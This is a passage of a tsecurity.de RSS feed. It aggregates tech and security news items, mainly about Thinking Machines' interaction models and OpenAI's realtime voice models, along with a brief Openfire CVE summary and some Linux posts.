<li>Gateway/mobile: allow paired iOS and Android clients to refresh same-family OS metadata on authenticated reconnect instead of requiring a new approval. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467055055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83490" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83490/hovercard" href="https://github.com/openclaw/openclaw/pull/83490">#83490</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>WhatsApp: treat <code>upload-file</code> as a supported media send intent by lowering path/URL uploads through the channel's normal send-media transport. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448275851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81883/hovercard" href="https://github.com/openclaw/openclaw/pull/81883">#81883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>iOS: end Live Activities when OpenClaw is connected, idle, or disconnected, and show compact attention states for approval-required reconnects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469191547" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83597" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83597/hovercard" href="https://github.com/openclaw/openclaw/pull/83597">#83597</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Control UI: hide child nav items when collapsing the active sidebar group. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051748466" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42167" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42167/hovercard" href="https://github.com/openclaw/openclaw/issues/42167">#42167</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052169484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42223" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42223/hovercard" href="https://github.com/openclaw/openclaw/pull/42223">#42223</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aroool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aroool">@Aroool</a>.</li>
<li>CI/proof: skip the real-behavior-proof gate for private org maintainers by minting a least-privilege (<code>members: read</code>) GitHub App token and checking active membership in the <code>maintainer</code> team, instead of treating <code>author_association=CONTRIBUTOR</code> as definitively external. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466090722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83418" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83418/hovercard" href="https://github.com/openclaw/openclaw/pull/83418">#83418</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[BlackBerry-Aktie: Realtime-Kurs mit starkem Plus – was hinter der Cybersecurity-Story steckt]]></title>
<description><![CDATA[... Sicherheitsfunktionen in IT- und OT-nahe Umgebungen integriert werden. BlackBerry adressiert nach der Vorlage vor allem Security-Lösungen für ...]]></description>
<link>https://tsecurity.de/de/3524276/it-security-nachrichten/blackberry-aktie-realtime-kurs-mit-starkem-plus-was-hinter-der-cybersecurity-story-steckt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3524276/it-security-nachrichten/blackberry-aktie-realtime-kurs-mit-starkem-plus-was-hinter-der-cybersecurity-story-steckt/</guid>
<pubDate>Sun, 17 May 2026 21:37:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Sicherheitsfunktionen in <b>IT</b>- und OT-nahe Umgebungen integriert werden. BlackBerry adressiert nach der Vorlage vor allem <b>Security</b>-Lösungen für ...]]></content:encoded>
</item>
<item>
<title><![CDATA[8. Kommentare in eine neue Installation von Collaboration Server migrieren - Strategy]]></title>
<description><![CDATA[Auf dem neuen Collaboration Server-Computer: MicroStrategy Collaboration/Realtime Service anhalten. Kopieren ./collaborationServer.sh stop. Öffnen Sie ...]]></description>
<link>https://tsecurity.de/de/3521218/windows-server/8-kommentare-in-eine-neue-installation-von-collaboration-server-migrieren-strategy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3521218/windows-server/8-kommentare-in-eine-neue-installation-von-collaboration-server-migrieren-strategy/</guid>
<pubDate>Sat, 16 May 2026 02:45:54 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Auf dem neuen Collaboration <b>Server</b>-Computer: MicroStrategy Collaboration/Realtime Service anhalten. Kopieren ./collaborationServer.sh stop. Öffnen Sie ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Ex-OpenAI-Chefin zeigt die Zukunft von KI: Interaction Models von Thinking Machines uvm. | KI-News]]></title>
<description><![CDATA[Author: Digitale Profis - Bewertung: 12x - Views:156 Artikel & Newsletter: https://digitaleprofis.de/kuenstliche-intelligenz/ki-news/die-ki-news-der-woche-vom-12-05-2026/

Quellen
Anzeigen in GPT 
Artikel: https://openai.com/de-DE/index/testing-ads-in-chatgpt/ 

Interaction Models von Thinking Ma...]]></description>
<link>https://tsecurity.de/de/3511056/ai-nachrichten/ex-openai-chefin-zeigt-die-zukunft-von-ki-interaction-models-von-thinking-machines-uvm-ki-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3511056/ai-nachrichten/ex-openai-chefin-zeigt-die-zukunft-von-ki-interaction-models-von-thinking-machines-uvm-ki-news/</guid>
<pubDate>Tue, 12 May 2026 18:18:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Digitale Profis - Bewertung: 12x - Views:156 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/vuFOF3hm08A?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Artikel & Newsletter: https://digitaleprofis.de/kuenstliche-intelligenz/ki-news/die-ki-news-der-woche-vom-12-05-2026/<br />
<br />
Quellen<br />
Anzeigen in GPT <br />
Artikel: https://openai.com/de-DE/index/testing-ads-in-chatgpt/ <br />
<br />
Interaction Models von Thinking Machines <br />
Artikel: https://thinkingmachines.ai/blog/interaction-models/ <br />
Video: https://www.youtube.com/watch?v=A12AVongNN4 <br />
<br />
GPT Realtime 2: <br />
Tweet: https://x.com/OpenAI/status/2052438194625593804 <br />
Artikel: https://openai.com/index/advancing-voice-intelligence-with-new-models-in-the-api/ <br />
<br />
Codex in Chrome <br />
Tweet: https://x.com/OpenAI/status/2052480800004956323 <br />
<br />
Claude für Office <br />
Tweet: https://x.com/claudeai/status/2052445786651168849 <br />
Artikel: https://claude.com/claude-for-microsoft-365 <br />
<br />
Gemini 3.1 Flash Lite <br />
Tweet: https://x.com/GoogleAIStudio/status/2052453828272812310 <br />
Artikel: https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-flash-lite-is-now-generally-available?hl=en <br />
<br />
Bessere Designs in Stitch <br />
Tweet: https://x.com/stitchbygoogle/status/2052795140927086946 <br />
<br />
Codex Remote Control <br />
Artikel: https://www.testingcatalog.com/openai-set-to-add-remote-codex-control-to-chatgpt-mobile-app/ <br />
<br />
OpenAI testet Werbung in ChatGPT, Thinking Machines zeigt eine neue Art von Echtzeit-KI und Claude greift Microsoft Office 365 direkt an. In diesem KI-Update fassen wir die wichtigsten AI-News der Woche kompakt für euch zusammen.<br />
<br />
Diese Woche geht es unter anderem um Anzeigen direkt in ChatGPT, neue Realtime-Modelle von OpenAI, Codex im Browser, Claude für Excel, Word, PowerPoint und Outlook, Gemini 3.1 Flash-Lite, bessere UI-Designs mit Google Stitch und ein mögliches neues Remote-Control-Feature für Codex.<br />
<br />
Besonders spannend: KI entwickelt sich gerade weg vom klassischen Chatbot und hin zu Assistenten, die live mitarbeiten, sprechen, sehen, Tools nutzen und direkt in unseren Arbeitsumgebungen aktiv werden.<br />
<br />
Werde Kanalmitglied und unterstütze damit unsere Arbeit:<br />
https://www.youtube.com/channel/UCv90NdTyTp7ZPPRvvSZaS5w/join<br />
<br />
Videoinhalt:<br />
00:00 Die KI-News der Woche vom 12.05.2026<br />
00:21 OpenAI baut Werbung in ChatGPT aus<br />
01:35 Thinking Machines stellt neue Interaction Modelle vor<br />
03:16 GPT Realtime 2, Translate und Whisper<br />
04:32 Codex kann jetzt Google Chrome bedienen<br />
05:38 Claude für Office greift Copilot an<br />
06:45 Gemini 3.1 Flash Lite<br />
07:47 Bessere Designs dank Update in Google Stitch<br />
08:55 Gerüchte über eine Fernsteuerung von Codex über die ChatGPT App<br />
<br />
Videovorschläge, Feedback und Kritik kannst Du uns jederzeit in den Kommentaren mitteilen!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thinking Machines shows off preview of near-realtime AI voice and video conversation with new 'interaction models']]></title>
<description><![CDATA[Is AI leaving the era of "turn-based" chat?Right now, all of us who use AI models regularly for work or in our personal lives know that the basic interaction mode across text, imagery, audio, and video remains the same: the human user provides an input, waits anywhere between milliseconds to minu...]]></description>
<link>https://tsecurity.de/de/3508580/it-nachrichten/thinking-machines-shows-off-preview-of-near-realtime-ai-voice-and-video-conversation-with-new-interaction-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508580/it-nachrichten/thinking-machines-shows-off-preview-of-near-realtime-ai-voice-and-video-conversation-with-new-interaction-models/</guid>
<pubDate>Tue, 12 May 2026 01:17:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Is AI leaving the era of "turn-based" chat?</p><p>Right now, all of us who use AI models regularly for work or in our personal lives know that the basic interaction mode across text, imagery, audio, and video remains the same: the human user provides an input, waits anywhere between milliseconds to minutes (or in some cases, for particularly tough queries, hours and <a href="https://venturebeat.com/ai/kimi-k2-6-runs-agents-for-days-and-exposes-the-limits-of-enterprise-orchestration">days</a>), and the AI model provides an output.</p><p>But if AI is to really take on the load of jobs requiring natural interaction, it will need to do more than provide this kind of "turn-based" interactivity — it will ultimately need to respond more fluidly and naturally to human inputs, even responding while also processing <i>the next</i> human input, be it text or another format. </p><p>That at least seems to be the contention of <a href="https://thinkingmachines.ai/blog/interaction-models/">Thinking Machines</a>, the <a href="https://venturebeat.com/ai/ex-openai-cto-mira-murati-unveils-thinking-machines-a-startup-focused-on-multimodality-human-ai-collaboration">well-funded AI startup</a> founded last year by former OpenAI chief technology officer Mira Murati and former OpenAI researcher and co-founder John Schulman, among others. </p><p>Today, the firm announced a research preview of what it deems to be "interaction models, a new class of native multimodal systems that treats interactivity as a first-class citizen of model architecture rather than an external software "harness," scoring some impressive gains on third-party benchmarks and reduced latency as a result. </p><div></div><p>However, the models are not yet available to the general public or even enterprises — the company says in its <a href="https://thinkingmachines.ai/blog/interaction-models/">announcement blog post:</a> "In the coming months, we will open a limited research preview to collect feedback, with a wider release later this year."</p><h2><b>'Full duplex' simultaneous input/output processing</b></h2><p>At the heart of this announcement is a fundamental shift in how AI perceives time and presence. Current frontier models typically experience reality in a single thread; they wait for a user to finish an input before they begin processing, and their perception freezes while they generate a response. </p><p>In their blog post, the Thinking Machines researchers described the status quo as a limitation that forces humans to "contort themselves" to AI interfaces, phrasing questions like emails and batching their thoughts.</p><p>To solve this "collaboration bottleneck," Thinking Machines has moved away from the standard alternating token sequence. </p><p>Instead, they use a multi-stream, micro-turn design that processes 200ms chunks of input and output simultaneously. </p><p>This "full-duplex" architecture allows the model to listen, talk, and see in real time, enabling it to backchannel while a user speaks or interject when it notices a visual cue—such as a user writing a bug in a code snippet or a friend entering a video frame. Technically, the model utilizes encoder-free early fusion. </p><p>Rather than relying on massive standalone encoders like Whisper for audio, the system takes in raw audio signals as dMel and image patches (40x40) through a lightweight embedding layer, co-training all components from scratch within the transformer.</p><h2><b>Dual model system</b></h2><p>The research preview introduces <b>TML-Interaction-Small</b>, a <b>276-billion parameter Mixture-of-Experts (MoE)</b> model with 12 billion active parameters. Because real-time interaction requires near-instantaneous response times that often conflict with deep reasoning, the company has architected a two-part system:</p><ol><li><p><b>The Interaction Model:</b> Stays in a constant exchange with the user, handling dialog management, presence, and immediate follow-ups.</p></li><li><p><b>The Background Model:</b> An asynchronous agent that handles sustained reasoning, web browsing, or complex tool calls, streaming results back to the interaction model to be woven naturally into the conversation.</p></li></ol><p>This setup allows the AI to perform tasks like live translation or generating a UI chart while continuing to listen to user feedback—a capability demonstrated in the announcement video where the model provided typical human reaction times for various cues while simultaneously generating a bar chart.</p><h2><b>Impressive performance on major benchmarks against other leading AI labs' fast interaction models</b></h2><p>To prove the efficacy of this approach, the lab utilized <b>FD-bench</b>, a benchmark specifically designed to measure interaction quality rather than just raw intelligence.The results show that <code>TML-Interaction-Small</code> significantly outperforms existing real-time systems:</p><ul><li><p><b>Responsiveness:</b> It achieved a turn-taking latency of <b>0.40 seconds</b>, compared to 0.57s for Gemini-3.1-flash-live and 1.18s for GPT-realtime-2.0 (minimal).</p></li><li><p><b>Interaction Quality:</b> On FD-bench V1.5, it scored <b>77.8</b>, nearly doubling the scores of its primary competitors (GPT-realtime-2.0 minimal scored 46.8).</p></li><li><p><b>Visual Proactivity:</b> In specialized tests like <b>RepCount-A</b> (counting physical repetitions in video) and <b>ProactiveVideoQA</b>, Thinking Machines’ model successfully engaged with the visual world while other frontier models remained silent or provided incorrect answers.</p></li></ul><table><tbody><tr><td><p><b>Metric</b></p></td><td><p><b>TML-Interaction-Small</b></p></td><td><p><b>GPT-realtime-2.0 (min)</b></p></td><td><p><b>Gemini-3.1-flash-live (min)</b></p></td></tr><tr><td><p><b>Turn-taking latency (s)</b></p></td><td><p><b>0.40</b></p></td><td><p>1.18</p></td><td><p>0.57</p></td></tr><tr><td><p><b>Interaction Quality (Avg)</b></p></td><td><p><b>77.8</b></p></td><td><p>46.8</p></td><td><p>54.3</p></td></tr><tr><td><p><b>IFEval (VoiceBench)</b></p></td><td><p>82.1</p></td><td><p>81.7</p></td><td><p>67.6</p></td></tr><tr><td><p><b>Harmbench (Refusal %)</b></p></td><td><p>99.0</p></td><td><p>99.5</p></td><td><p>99.0</p></td></tr></tbody></table><h2><b>A potentially huge boon to enterprises — once the models are made available</b></h2><p>If made available to the enterprise sector, Thinking Machines' interaction models would represent a fundamental shift in how businesses integrate AI into their operational workflows. </p><p>A native interaction model like TML-Interaction-Small allows for several enterprise capabilities that are currently impossible or highly brittle with standard multimodal models:</p><p>Current enterprise AI requires a "turn" to be completed before it can analyze data. In a manufacturing or lab setting, a native interaction model can monitor a video feed and proactively interject the moment it detects a safety violation or a deviation from a protocol — without waiting for the worker to ask for feedback. </p><p>The model's success in visual benchmarks like RepCount-A (accurate repetition counting) and ProactiveVideoQA (answering questions as visual evidence appears) suggests it could serve as a real-time auditor for high-stakes physical tasks.</p><p>The primary friction in voice-based customer service is the 1–2 second "processing" delay common in 2026's standard APIs. Thinking Machines' model achieves a turn-taking latency of 0.40 seconds, roughly the speed of a natural human conversation. </p><p>Because it handles simultaneous speech natively, an enterprise support bot could listen to a customer's frustration, provide "backchannel" cues (like "I see" or "mm-hmm") without interrupting the user, and offer live translation that feels like a natural conversation rather than a series of disjointed recordings.</p><p>Standard LLMs lack an internal clock; they "know" time only if it is provided in a text prompt. Interaction models are natively time-aware, allowing them to manage time-sensitive processes like "Remind me to check the temperature every 4 minutes" or "Alert me if this process takes longer than the last one". This is critical for industrial maintenance and pharmaceutical research where timing is an essential variable.</p><h2><b>Background on Thinking Machines</b></h2><p>This release marks the second major milestone for Thinking Machines following the <a href="https://venturebeat.com/ai/thinking-machines-first-official-product-is-here-meet-tinker-an-api-for">October 2025 launch of Tinker</a>, a managed API for fine-tuning language models that lets researchers and developers control their data and training methods while Thinking Machines handles the infrastructure burden of distributed training. </p><p>The company said Tinker supports both small and large open-weight models, including mixture-of-experts models, and early users included groups at Princeton, Stanford, Berkeley and Redwood Research.</p><p>At launch in early 2025, Thinking Machines framed itself as an AI research and product company trying to make advanced AI systems “more widely understood, customizable and generally capable.”</p><p>In July 2025, Thinking Machines said it had raised about $2 billion at a <a href="https://www.reuters.com/technology/mira-muratis-ai-startup-thinking-machines-raises-2-billion-a16z-led-round-2025-07-15/">$12 billion valuation</a> in a round led by Andreessen Horowitz, with participation from Nvidia, Accel, ServiceNow, Cisco, AMD and Jane Street, described by <a href="https://www.wired.com/story/thinking-machines-lab-mira-murati-funding/">WIRED</a> as the largest seed funding round in history.</p><p><i></i><a href="https://www.wsj.com/tech/ai/meta-zuckerberg-ai-recruiting-fail-e6107555"><i>The Wall Street Journal </i></a>reported in August 2025 that rival tech CEO Mark Zuckerberg approached Murati about acquiring Thinking Machines Lab and, after she declined, Meta pursued more than a dozen of the startup’s roughly 50 employees. </p><p>In March and April 2026, the company also became known for its compute ambitions: it announced a <a href="https://thinkingmachines.ai/news/nvidia-partnership/">Nvidia partnership </a>to deploy at least one gigawatt of next-generation Vera Rubin systems, then<a href="https://www.googlecloudpresscorner.com/2026-04-22-Thinking-Machines-Expands-Use-of-Google-Cloud-AI-Hypercomputer"> expanded its Google Cloud relationship to use Google’s AI Hypercomputer infrastructure</a> with Nvidia GB300 systems for model research, reinforcement learning workloads, frontier model training and Tinker.</p><p>By April 2026, <a href="https://www.businessinsider.com/meta-attracts-more-thinking-machines-lab-talent-in-ai-shakeup-2026-4">Business Insider reported </a>that Meta had hired seven founding members from Thinking Machines, including Mark Jen and Yinghai Lu, while another Thinking Machines researcher, Tianyi Zhang, also moved to Meta. The same reporting said Joshua Gross, who helped build Thinking Machines’ flagship fine-tuning product Tinker, had joined Meta Superintelligence Labs, and that the company had grown to about 130 employees despite the departures. </p><p>Thinking Machines was not simply losing people, however: it also hired Meta veteran Soumith Chintala, creator of PyTorch, as CTO, and added other high-profile technical talent such as Neal Wu. <a href="https://techcrunch.com/2026/04/24/metas-loss-is-thinking-machines-gain/">TechCrunch</a> separately reported in April 2026 that Weiyao Wang, an eight-year Meta veteran who worked on multimodal perception systems, had joined Thinking Machines, underscoring that the talent flow was not one-way.</p><p>Thinking Machines previously stated it was committed to "significant open source components" in its releases to empower the research community. It's unclear if these new interaction models models will fall under the same ethos and release terms. </p><p>But one thing is certain: by making interactivity native to the model, Thinking Machines believes that scaling a model will now make it both smarter and a more effective collaborator.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Introduces Realtime Voice AI for Translation, Transcription, and Task Handling]]></title>
<description><![CDATA[OpenAI expanded its Realtime API with GPT-Realtime-2, plus new translation and transcription models for faster AI voice agents.
The post OpenAI Introduces Realtime Voice AI for Translation, Transcription, and Task Handling appeared first on eWEEK.]]></description>
<link>https://tsecurity.de/de/3507488/it-nachrichten/openai-introduces-realtime-voice-ai-for-translation-transcription-and-task-handling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507488/it-nachrichten/openai-introduces-realtime-voice-ai-for-translation-transcription-and-task-handling/</guid>
<pubDate>Mon, 11 May 2026 17:03:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI expanded its Realtime API with GPT-Realtime-2, plus new translation and transcription models for faster AI voice agents.</p>
<p>The post <a href="https://www.eweek.com/news/openai-gpt-realtime-2-voice-agents/">OpenAI Introduces Realtime Voice AI for Translation, Transcription, and Task Handling</a> appeared first on <a href="https://www.eweek.com/">eWEEK</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2014-2741 | Ignite Realtime Openfire 3.9.1 access control (VU#495476 / Nessus ID 76494)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Ignite Realtime Openfire 3.9.1. This issue affects some unknown processing. Executing a manipulation can lead to improper access controls.

This vulnerability appears as CVE-2014-2741. The attack may be performed from remote. There...]]></description>
<link>https://tsecurity.de/de/3504309/sicherheitsluecken/cve-2014-2741-ignite-realtime-openfire-391-access-control-vu495476-nessus-id-76494/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504309/sicherheitsluecken/cve-2014-2741-ignite-realtime-openfire-391-access-control-vu495476-nessus-id-76494/</guid>
<pubDate>Sun, 10 May 2026 09:40:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/ignite_realtime:openfire">Ignite Realtime Openfire 3.9.1</a>. This issue affects some unknown processing. Executing a manipulation can lead to improper access controls.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2014-2741">CVE-2014-2741</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI erweitert KI-Portfolio: Neue Audio-Modelle und Cyber-Sicherheitslösung]]></title>
<description><![CDATA[OpenAI stellt mit GPT-Realtime-2 und GPT-5.5-Cyber zwei spezialisierte KI-Modelle vor, die auf Sprachinteraktion und Cybersicherheit fokussieren.]]></description>
<link>https://tsecurity.de/de/3503233/it-security-nachrichten/openai-erweitert-ki-portfolio-neue-audio-modelle-und-cyber-sicherheitsloesung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503233/it-security-nachrichten/openai-erweitert-ki-portfolio-neue-audio-modelle-und-cyber-sicherheitsloesung/</guid>
<pubDate>Sat, 09 May 2026 16:40:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI stellt mit GPT-Realtime-2 und GPT-5.5-Cyber zwei spezialisierte KI-Modelle vor, die auf Sprachinteraktion und <b>Cybersicherheit</b> fokussieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI brings GPT-5-class reasoning to real-time voice — and it changes what voice agents can actually orchestrate]]></title>
<description><![CDATA[Voice agents have been expensive to run and painful to orchestrate, not because the models can't handle conversation, but because context ceilings forced enterprises to build session resets, state compression, and reconstruction layers into every deployment. OpenAI's three new voice models are de...]]></description>
<link>https://tsecurity.de/de/3501916/it-nachrichten/openai-brings-gpt-5-class-reasoning-to-real-time-voice-and-it-changes-what-voice-agents-can-actually-orchestrate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501916/it-nachrichten/openai-brings-gpt-5-class-reasoning-to-real-time-voice-and-it-changes-what-voice-agents-can-actually-orchestrate/</guid>
<pubDate>Sat, 09 May 2026 00:33:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Voice agents have been expensive to run and painful to orchestrate, not because the models can't handle conversation, but because context ceilings forced enterprises to build session resets, state compression, and reconstruction layers into every deployment. OpenAI's three new voice models are designed to reduce that overhead, and they change how engineers can think about building voice into a larger agent stack.</p><p>GPT-Realtime-2, GPT-Realtime-Translate, and GPT-Realtime-Whisper integrate real-time audio into the model management stack as discrete orchestration primitives — separating conversational reasoning, translation, and transcription into specialized components rather than bundling them in a single voice product.</p><p>The company said in <a href="https://openai.com/index/advancing-voice-intelligence-with-new-models-in-the-api/">a blog post</a> that Realtime-2 is its first voice model “with GPT-5 class reasoning” and can handle difficult requests and keep conversations flowing naturally. Realtime-Translate understands more than 70 languages and translates them into 13 others at the speaker's pace, and Realtime-Whisper is its new speech-to-text transcription model.</p><p>These three actions no longer sit inside a single stack or model. GPT-Realtime-2 could technically handle transcription, but OpenAI is routing distinct tasks to specialized models: Realtime-Translate for multilingual speech and Realtime-Whisper for transcription. Enterprises can assign each task to the appropriate model rather than routing everything through a single, all-encompassing voice system.</p><p>The new OpenAI models compete against <a href="https://venturebeat.com/orchestration/mistral-ai-just-released-a-text-to-speech-model-it-says-beats-elevenlabs-and">Mistral’s Voxtral models</a>, which also separate transcription and target enterprise use cases.  </p><h2>What enterprises should do</h2><p>More enterprises are seeing the value of voice agents now that more people are becoming comfortable conversing with an AI agent, and also because of the richness of data from voice customer interactions.</p><p>Organizations evaluating these models will need to consider their orchestration architecture, not just model quality — specifically, whether their stack can route discrete voice tasks to specialized models and manage state across a 128K-token context window.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ESC Brazil - Realtime Linux with RT_PREEMPT]]></title>
<description><![CDATA[Two weeks ago I’d give a
talk
about realtime Linux at ESC Brazil: “Usando Linux como Sistema de Tempo
Real” (Using Linux as a realtime OS). Sadly some days before while
playing soccer  I broke my fibula and I had to have a surgery. I regret
I couldn’t attend this conference.
At least in the compa...]]></description>
<link>https://tsecurity.de/de/3501219/downloads/esc-brazil-realtime-linux-withrtpreempt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501219/downloads/esc-brazil-realtime-linux-withrtpreempt/</guid>
<pubDate>Fri, 08 May 2026 23:06:57 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two weeks ago <a href="http://www.escbrazil.com.br/index.php?canal=conferencias&amp;pgID=100511-190927-0c941272">I’d give a
talk</a>
about realtime Linux at <span class="caps">ESC</span> Brazil: “Usando Linux como Sistema de Tempo
Real” (Using Linux as a realtime <span class="caps">OS</span>). Sadly some days before while
playing soccer  I broke my fibula and I had to have a surgery. I regret
I couldn’t attend this conference.</p>
<p>At least in the company I work for there are more people with knowledge
in this area. <a href="http://blog.gustavobarbieri.com.br/2011/06/02/esc-brazil-realtime-linux-with-rt_preempt/">Gustavo
Barbieri</a>
went there in my place and had a <a href="http://www.sergioprado.org/2011/05/25/relato-do-esc-brasil-2011-dia-2/">good
feedback</a>
from the attendees.</p>
<p>Now I have stay home. At least for 1 or 2 months :-(.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Next Linux/UNIX System Programming course in Munich, 5-9 February, 2018]]></title>
<description><![CDATA[There are still some places free for my next 5-day Linux/UNIX System Programming course to take place in Munich, Germany, for the week of 5-9 February 2018. 

The course is intended for programmers developing system-level, embedded, or network applications for Linux and UNIX systems, or programme...]]></description>
<link>https://tsecurity.de/de/3501183/downloads/next-linuxunix-system-programming-course-in-munich-5-9-february-2018/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501183/downloads/next-linuxunix-system-programming-course-in-munich-5-9-february-2018/</guid>
<pubDate>Fri, 08 May 2026 23:06:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[There are still some places free for my next 5-day Linux/UNIX System Programming course to take place in Munich, Germany, for the week of 5-9 February 2018. <br>
<br>
The course is intended for programmers developing system-level, embedded, or network applications for Linux and UNIX systems, or programmers porting such applications from other operating systems (e.g., proprietary embedded/realtime operaring systems or Windows) to Linux or UNIX. The course is based on my book, <a href="http://man7.org/tlpi/">The Linux Programming Interface</a> (TLPI), and covers topics such as low-level file I/O; 
signals and timers; creating processes and executing programs; POSIX 
threads programming; interprocess communication (pipes, FIFOs, message 
queues, semaphores, shared memory), and network programming (sockets).<br>
      <br>
The course has a lecture+lab format, and 
devotes substantial time to working on some carefully chosen programming
 exercises that put the "theory" into practice. Students receive printed and electronic copies of TLPI, along with a 600-page course book that includes all slides presented in the course. A reading knowledge of C is 
assumed; no previous system programming experience is needed.<br>
<br>
Some useful links for anyone interested in the course:<br>
<ul>
<li><a href="http://man7.org/training/sys_prog/">course overview</a> (includes sample course materials, course 
dates and locations, and prices); </li>
<li><a href="http://man7.org/training/sys_prog/sys_prog_course_outline.html">course topic list</a>; and </li>
<li><a href="http://man7.org/training/reasons_to_choose_man7.html">information about the trainer</a> (i.e., me).</li>
<li><a href="http://man7.org/training/sys_prog/man7.org_training_M7D-SP01.pdf">2-page PDF containing key information about the course</a></li>
</ul>
Questions about the course? Email me via <a href="mailto:training@man7.org">training@man7.org</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gizmodo article]]></title>
<description><![CDATA[Gizmodo has an article by Brian Lam that has some assertions about E-Ink displays. He writes:"E-ink is superior for replicating paper, but it can't even support realtime cursor, movements or button presses, let alone video"Realtime cursor generally just means functionality as shown here: a) rgbpa...]]></description>
<link>https://tsecurity.de/de/3500930/unix-server/gizmodo-article/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500930/unix-server/gizmodo-article/</guid>
<pubDate>Fri, 08 May 2026 22:59:37 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
